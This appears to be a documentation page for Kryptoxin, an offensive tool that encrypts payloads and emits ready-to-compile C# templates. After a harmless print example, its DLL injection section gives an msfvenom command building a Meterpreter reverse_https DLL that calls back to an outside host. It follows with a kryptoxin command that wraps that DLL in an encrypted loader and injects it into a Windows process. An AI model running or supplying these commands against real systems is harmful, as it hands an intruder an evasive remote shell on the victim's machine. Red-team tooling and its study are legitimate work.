C# (.NET)¶

Kryptoxin supports the C# programming language as an output language for templates.

Overview¶

The C# language is very valuable in the security field, as it provides access to the .NET framework capabilities. Managed programs and DLLs can be written to perform system API calls while granting access to more sophisticated functions such as AES decryption.

All templates shipped with Kryptoxin can be directly pasted into Visual Studio (we recommended versions >= 2022) and be compiled without modification.

Print Program (print)¶

This basic console program simply prints the UTF-8 encoded text encrypted by Kryptoxin. It uses the System.Security.Cryptography .NET class, which is widely supported by current Windows hosts.

python -m kryptoxin encrypt -k s3cret --random-iv --random-salt \
--alg AES --key_size 192 --iter 5000 --lang csharp --action print

using System.Security.Cryptography;

class Program // (1)!
{

    [...]

    static void Main(string[] args) // (2)!
    {
        [...]
    }
}

1. The class generated must be imported in a C# .NET Console Program project.
2. The main entry point is Main(), the latter will call the decoding and decryption routines.

DLL Process Injection (load-library)¶

This .NET console program injects a DLL such as those generated by the metasploit's msfvenom utility into the explorer.exe process.

The example below encrypt the msf.dll generated by msfvenom and output a C# console program source code that can be readily pasted into a Microsoft Visual Studio project.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=w.x.y.z LPORT=443 \
EXITFUNC=thread -f dll -o msf.dll

python -m kryptoxin encrypt -k 123456 --random-iv --random-salt \
--lang csharp --action load-dll --in msf.dll --dllname=aton32.dll \
--process=notepad.exe